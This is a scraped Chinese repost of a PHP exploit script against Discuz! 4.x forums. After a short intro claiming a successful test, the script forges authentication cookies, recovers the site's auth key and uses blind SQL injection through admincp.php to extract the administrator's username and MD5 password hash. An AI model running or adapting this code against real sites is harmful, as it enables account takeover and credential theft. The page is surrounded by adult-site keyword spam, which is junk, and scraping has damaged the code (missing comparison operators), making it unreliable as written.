校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > Discuz! 4.x SQL injection / admin credentials disclosure exploit

Discuz! 4.x SQL injection / admin credentials disclosure exploit

熱門標簽:寧夏保險智能外呼系統哪家好 臨滄移動外呼系統哪家有 溫嶺代理外呼系統 隨州銷售外呼系統平臺 不同的地圖標注 交行外呼系統有哪些 怎么更改地圖標注電話 激戰黃昏地圖標注說明 防城港市ai電銷機器人

前段時間發過Discuz! 5.0.0 GBK版本的EXP
今天在CN.Tink那里看到的4.x的,我去原站轉了過來,然后找了個Discuz! 4.1.0測試了一下,成功,看下面截圖,Discuz! 5.0.0 GBK版本的那個EXP又許多朋友不知道怎么用,當時我說了下,還是有朋友不明白,這次我截了圖上來,不知道怎么用的朋友看下應該明白的。
圖:http://photo.bababian.com/20061105/E8D09F4CD48014220CD6C955EC88FAC9_500.jpg

復制代碼 代碼如下:

?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc3) {
 print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
 -p[port]: specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
 die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i=strlen($string)-1; $i++)
 {
 if ((ord($string[$i]) = 32 ) | (ord($string[$i]) > 126 ))
 {$result.=" .";}
 else
 {$result.=" ".$string[$i];}
 if (strlen(dechex(ord($string[$i])))==2)
 {$exa.=" ".dechex(ord($string[$i]));}
 else
 {$exa.=" 0".dechex(ord($string[$i]));}
 $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
 $ock=fsockopen(gethostbyname($host),$port);
 if (!$ock) {
 echo 'No response from '.$host.':'.$port; die;
 }
 }
 else {
 $c = preg_match($proxy_regex,$proxy);
 if (!$c) {
 echo 'Not a valid proxy...';die;
 }
 $parts=explode(':',$proxy);
 echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 $ock=fsockopen($parts[0],$parts[1]);
 if (!$ock) {
 echo 'No response from proxy...';die;
 }
 }
 fputs($ock,$packet);
 if ($proxy=='') {
 $html='';
 while (!feof($ock)) {
 $html.=fgets($ock);
 }
 }
 else {
 $html='';
 while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 $html.=fread($ock,1);
 }
 }
 fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]>'/') or ($path[strlen($path)-1]>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "please wait...\n";

//from global.func.php
function authcode($string, $operation, $key = '') {
 $key = $key ? $key : $GLOBALS['discuz_auth_key'];
 $coded = '';
 $keylength = 32;
 $string = $operation == 'DECODE' ? base64_decode($string) : $string;
 for($i = 0; $i  strlen($string); $i += 32) {
 $coded .= substr($string, $i, 32) ^ $key;
 }
 $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
 return $coded;
}

//stolen from install.php
function random($length) {
 $hash = '';
 $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
 $max = strlen($chars) - 1;
 mt_srand((double)microtime() * 1000000);
 for($i = 0; $i  $length; $i++) {
 $hash .= $chars[mt_rand(0, $max)];
 }
 return $hash;
}

$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i=255; $i++){$tt.=chr($i);}
while (1)
{
 $discuz_auth_key=random(32);
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
 $packet.="User-Agent: $agent\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 $html=html_entity_decode($html);
 $html=str_replace("br />","",$html);
 $t=explode("AND m.password='",$html);
 $t2=explode("' ",$t[1]);
 $pwd_f=$t2[0];
 $t=explode("AND m.secques='",$html);
 $t2=explode("'\n",$t[1]);
 $secques_f=$t2[0];
 $t=explode("AND m.uid='",$html);
 $t2=explode("'\x0d",$t[1]);
 $uid_f=$t2[0];
 $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
 if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
 break;
 }
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j32; $j++){
 for ($i=0; $i255; $i++){
 $aa="";
 if ($j>0){
 for ($k=1; $k=$j; $k++){
 $aa.="a";
 }
 }
 $GLOBALS['discuz_auth_key']=$aa.chr($i);
 $t = authcode($temp,"DECODE");
 if ($t[$j]==$my_string[$j]){
 $key.=chr($i);
 }
 }
}

//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;

echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
 for ($i=0; $i=255; $i++)
 {
 if (in_array($i,$chars))
 {
 //you can use every char because of base64_decode()...so this bypass magic quotes...
 //and some help by extract() to overwrite vars
 $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $password.=chr($i);echo chr($i);sleep(1);break;
 }
 }
 if ($i==255) {
 die("\nExploit failed...");
 }
 }
$j++;
}

echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
 for ($i=0; $i=255; $i++)
 {
 $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $admin.=chr($i);echo chr($i);sleep(1);break;
 }
 if ($i==255) {die("\nExploit failed...");}
 }
$j++;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
 echo "exploit succeeded...";
}
else {
 echo "exploit failed...";
}
?>

標簽:忻州 沈陽 哈密 阜陽 河源 青海 紅河 無錫

巨人網絡通訊聲明:本文標題《Discuz! 4.x SQL injection / admin credentials disclosure exploit》,本文關鍵詞  Discuz,4.x,SQL,injection,admin,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Discuz! 4.x SQL injection / admin credentials disclosure exploit》相關的同類信息!
  • 本頁收集關于Discuz! 4.x SQL injection / admin credentials disclosure exploit的相關信息資訊供網民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    中文字幕乱码亚洲精品一区| 日韩欧美成人激情| 粉嫩久久99精品久久久久久夜| 日韩成人一级大片| 视频在线观看一区二区三区| 亚洲国产sm捆绑调教视频| 一区二区在线看| 一区二区理论电影在线观看| 亚洲成人一区在线| 日韩黄色片在线观看| 日本在线播放一区二区三区| 日韩国产一区二| 久久精品国产久精国产爱| 免费观看在线综合| 国产乱色国产精品免费视频| 丁香天五香天堂综合| 91色porny蝌蚪| 欧美四级电影网| 精品国产乱码久久久久久蜜臀| 久久久噜噜噜久久中文字幕色伊伊| 久久蜜桃av一区精品变态类天堂| 亚洲国产精品ⅴa在线观看| 亚洲视频在线观看三级| 亚洲成人一区二区在线观看| 久久福利资源站| 成人免费观看视频| 在线观看视频一区二区欧美日韩| 欧美另类一区二区三区| 久久综合九色综合欧美98| 亚洲三级电影网站| 免费观看日韩电影| 91小视频在线| 欧美成人精品1314www| 亚洲欧美在线aaa| 日本视频中文字幕一区二区三区| 国产精品 日产精品 欧美精品| 欧美中文字幕一区二区三区| 日韩欧美国产高清| 亚洲精品午夜久久久| 国产精品一二三区在线| 欧美日韩中文精品| 国产精品女主播在线观看| 偷拍亚洲欧洲综合| bt7086福利一区国产| 精品粉嫩aⅴ一区二区三区四区| 中文字幕亚洲欧美在线不卡| 久久草av在线| 69av一区二区三区| 中文字幕亚洲成人| 国产福利精品导航| 精品少妇一区二区三区日产乱码| 亚洲欧美一区二区三区极速播放| 老司机精品视频导航| 亚洲在线视频网站| 成人精品国产一区二区4080| 日韩欧美国产三级| 日韩电影在线观看一区| 欧洲精品视频在线观看| 国产亚洲一二三区| 免费成人在线网站| 欧美日本不卡视频| 亚洲一区二区三区四区在线免费观看| 成人午夜av影视| 精品日韩一区二区三区| 日韩精彩视频在线观看| 欧美三级视频在线| 一区二区三区成人在线视频| 99久久亚洲一区二区三区青草 | 中文字幕高清不卡| 精品在线播放午夜| 日韩欧美中文一区| 视频一区二区中文字幕| 在线播放中文字幕一区| 亚洲va国产天堂va久久en| 97久久超碰国产精品电影| 国产精品福利一区| 色综合天天视频在线观看 | 欧美色网一区二区| 亚洲一卡二卡三卡四卡无卡久久| 色综合天天综合在线视频| 亚洲欧洲99久久| 在线国产电影不卡| 日日夜夜一区二区| 日韩女优毛片在线| 麻豆成人免费电影| 精品国产一区a| 盗摄精品av一区二区三区| 日韩精品中午字幕| 91精品国产综合久久精品| 丝袜亚洲另类欧美| 精品毛片乱码1区2区3区| 久久99热这里只有精品| 久久综合九色综合97婷婷女人| 狠狠久久亚洲欧美| 国产欧美日韩在线观看| av资源站一区| 亚洲一区二区三区不卡国产欧美| 欧美伦理视频网站| 精品一区二区国语对白| 国产精品嫩草99a| 欧美精选一区二区| 国产精品1区2区| 亚洲一区在线观看网站| 日韩精品综合一本久道在线视频| 成人av第一页| 日本在线不卡一区| 日韩久久一区二区| 91精品国产综合久久久久久漫画 | 欧美va亚洲va香蕉在线| 国产白丝网站精品污在线入口| 国产精品久久午夜夜伦鲁鲁| 欧美日韩精品欧美日韩精品 | 色综合婷婷久久| 日本 国产 欧美色综合| 国产精品成人在线观看| 日韩一区二区影院| 91欧美一区二区| 看电影不卡的网站| 亚洲一区欧美一区| 欧美激情在线观看视频免费| 91精品国产综合久久福利软件| 成人免费高清视频在线观看| 日韩高清不卡一区二区三区| 成人免费视频在线观看| 久久蜜桃香蕉精品一区二区三区| 欧美在线啊v一区| 成人看片黄a免费看在线| 久久精品国产一区二区| 亚洲高清免费观看高清完整版在线观看| 久久蜜桃av一区二区天堂| 在线成人午夜影院| 欧美日韩国产在线观看| 91亚洲午夜精品久久久久久| 国产黑丝在线一区二区三区| 蜜桃视频在线观看一区二区| 洋洋av久久久久久久一区| 国产精品视频免费看| 精品久久国产老人久久综合| 欧美日韩不卡一区| 欧美视频一区在线| 日本乱人伦aⅴ精品| 成人黄页在线观看| 粉嫩aⅴ一区二区三区四区| 麻豆成人久久精品二区三区小说| 性欧美疯狂xxxxbbbb| 一区二区三区四区精品在线视频| 国产欧美日韩精品a在线观看| 久久青草国产手机看片福利盒子 | 开心九九激情九九欧美日韩精美视频电影 | 4438x成人网最大色成网站| 色综合天天综合网天天狠天天 | 香蕉加勒比综合久久| 亚洲精品高清视频在线观看| 亚洲精品欧美二区三区中文字幕| 国产精品美女一区二区在线观看| 日本一区二区三区在线不卡| 久久女同性恋中文字幕| 国产日韩欧美精品一区| 国产精品日韩成人| 1000精品久久久久久久久| 亚洲欧美日韩国产综合| 尤物视频一区二区| 亚洲午夜久久久| 青青草国产成人av片免费| 精品一区二区三区在线观看国产| 九九国产精品视频| 成人av资源站| 在线视频一区二区免费| 欧美一区三区二区| 国产午夜精品福利| 亚洲精品成人悠悠色影视| 视频一区免费在线观看| 国产一区二区精品在线观看| av电影天堂一区二区在线| 在线观看国产一区二区| 日韩欧美国产一二三区| 欧美极品xxx| 亚洲午夜影视影院在线观看| 蜜臀av性久久久久蜜臀aⅴ流畅| 国产91在线观看| 欧美日韩小视频| 久久久久久一二三区| 一区二区三区欧美激情| 青青草国产成人99久久| 国产+成+人+亚洲欧洲自线| 欧美日韩一区精品| 日本一区二区动态图| 亚洲在线成人精品| 国产精品一区二区不卡| 欧美三区免费完整视频在线观看| 2023国产一二三区日本精品2022| 国产精品国产三级国产aⅴ无密码| 亚洲国产精品久久久久秋霞影院| 狠狠色综合日日| 欧美日韩国产影片| 亚洲人成电影网站色mp4| 精品夜夜嗨av一区二区三区| 色综合久久88色综合天天| 久久久久久久久免费| 亚洲成人av电影|